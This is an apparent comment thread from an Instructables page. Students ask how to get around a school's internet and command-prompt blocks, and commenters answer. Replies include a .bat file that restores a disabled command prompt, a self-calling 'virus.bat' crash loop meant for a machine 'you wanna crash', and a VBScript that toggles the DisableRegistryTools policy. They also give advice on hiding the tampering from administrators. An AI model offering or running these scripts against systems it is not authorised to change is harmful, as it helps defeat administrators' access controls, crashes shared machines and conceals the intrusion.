Remove these ads by
Signing UpStep 1Press the Start Button
| « Previous Step | Download PDFView All Steps | Next Step » |
Remove these ads by
Signing Up| « Previous Step | Download PDFView All Steps | Next Step » |

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.
I'm in highschool and the internet block is very strict. it wont even let us go on google translate! Seriously people! I need to do an assignment where i have to translate a recipe into italian, using an italian dictionary. we can also get help from google translate. i cant find a few words in the dictionary, so i really need to look yhem up on google translate, but it wont let me in! I tried typing cmd in Run, but it wouldnt let me. so i wrote command.com and made it into a .bat file and i typed in www.myspace.com and the ip came up, but when i typed the ip address into IE, it said it was blocked by the queensland government! PPPPPPLLLLLLLEEEEAAAAAAAAAASSSSSSSSSEEEEEEEEE HHHHHHHEEEEEEEEEELLLLLLLLLPPPPPPPPP MMMMMMEEEEEEE!!!!!!!!!!
You can also use this method at home, write down the IP and bring it to school!
PPPPPPPPPPLLLLLLLLLLLLLLEEEEEEEEEEAAAAAAAAAAAASSSSSSSSSSEEEEEEEEEE
Ping http://www.instructables.com (enter)
and all that came up was: Ping request could not find host (see above). Please check the name and try again. WHAT DO I DO!!!!!!?????!!!!!!!
ANYONE!!!!!!!!!!!!!!!!!
Anything you know that can help?
Information would help
but it must have already bean tried and now he's blocked the c prompt and I cant even run basic software have you got any advice btw if I find a way how to get past it i will be sure to post it.
@echo off
command
@echo on
Save it as a .bat file, then open it, and you should have a functioning command prompt.
WTF DO I DO??
thanks though for the tip.
1. open up notepad.
2.then type in the code below. and press enter after each so they are on seperate lines.
Start virus.bat
virus.bat
@echo
3.go to file, save as, then save where ever but make sure the file name is virus.bat
4.open it up and let hell break loose!
please leave comments after trying thnx!
ps. do NOT open on your computer make sure you do it on the one you wanna crash hahaha
btw I was joking if you hold the school tech hostage you will get arrested i know I dont need to tell you this but there are some people out there stupid enough to listen to me lol :~0
If your school has blocked command prompt do as the others say and type in ping somewebsite.com but then press enter and type pause. That causes the window not to close unless you type something that way its easier to copy the ip adress.
Find a way to create at text file or better yet use office word whatever word processor... most schools have those on edu-PCs
1 If you gain access to the registry you are home free.
2 DO make a backup of the full entire registry before messing with any of it just in case you hose it. Learn how to do that.. read about it.
3 Read about local group policies and know what you are doing otherwise run the script again and leave it alone.
4 Warning: your user name will be stamped all over the failed attempts if you mess up and they will look at the last login... and privileged events so use regedit to save a before and after copy and run the .vbs again when you are finished tweaking broken PCs attract tech attention functional ones don't. PS clean up after yourselves no vbs on the desktop or in trash can – The good and courteous housekeeping rule, get rid of your clutter and clean up your space. -
5 Single out only 1 ( ONE ) PC and use it as a test dummy, Please respect the Admin's job as a "White Hat" because it isn't easy. DO NOT go for all the computers.
6 You do not have bragging rights, keep the mouth shut and don’t share.. let others learn just as you “might have”.
7 I respect Admins be they White, Red, Black, Blue or Yellow hats... but I believe Admins need to sharpen their skills. Being handed your hat by a kid who thinks positively, who has learned and isn't a there to be spiteful is a good challenge and humbling experience. If admins loose their cool and go bonkers be respectful and keep this to yourself “they need to go back to school if they can’t google a fix for this.. )
8 Stick to the small public PC only, Personal or Staff PCs are Private and you MUST treat them as so, consider the grief that can come raining down not a pretty picture. (use the learning PCs for learning J ) and leave Academics and Administration alone… you’ll live longer.
9 (Optional: could be bad or good - just don't let others know about it or see it) Keep a journal, make an outline , define what your intentions are, your motivations, trials successes and failures, discoveries and results, a documented step by step process, don't be crude be serious. This just might confuse the heck out of Administration and get you a fair letter grade for originality alone but writing a report on scientific problems solving and solutions on software solutions… would go even farther.
*A little bragging rights, and a happy ending.*
This hair-brained approach to academia worked for me. I turned in my work on the teacher’s desk with him there or not and only had to show up for class for the final as I learned Advanced scripting on my own trying crazy things like this…, it gave me an A+ for the course. Just wish English was that fun..
Disclaimer: Result will vary, We all are responsible for our own actions and that’s why I’m not sharing how to do a hostile takeover of local Admin account…
Constructive learning is a good thing, treat it as such, use it wisely, build the understanding, research AND be honest if you are nailed, otherwise keep da mouth shut and smile alot.
I you are logging in via a XP to a linux box sorry I’m not going to comment on that one because you would be way over your heads and up against over 500 freelance patchers and hackers.. and more than Bill Gates could ever dream of having on hand for free updates/fixes/patches. The Admin would be a little more stout and wary about scripting and the lock-down protocols are much more stringent. But I have known a few classmates to drive the linux wheel pretty good with two fingers.
I you're going to do it, go straight for the neck and learn some things and quit messing around with proxys, tunnels and back door omissions.
.vbs Code starts after lines and ends before.
Be good and learn.
Option Explicit
'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
'Create the registry key value for DisableRegistryTools with value 0
WSHShell.RegWrite p, 0, itemtype
End If
'If the key is present, or was created, it is toggled
'Confirmations can be disabled by commenting out
'the two MyBox lines below
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)
End If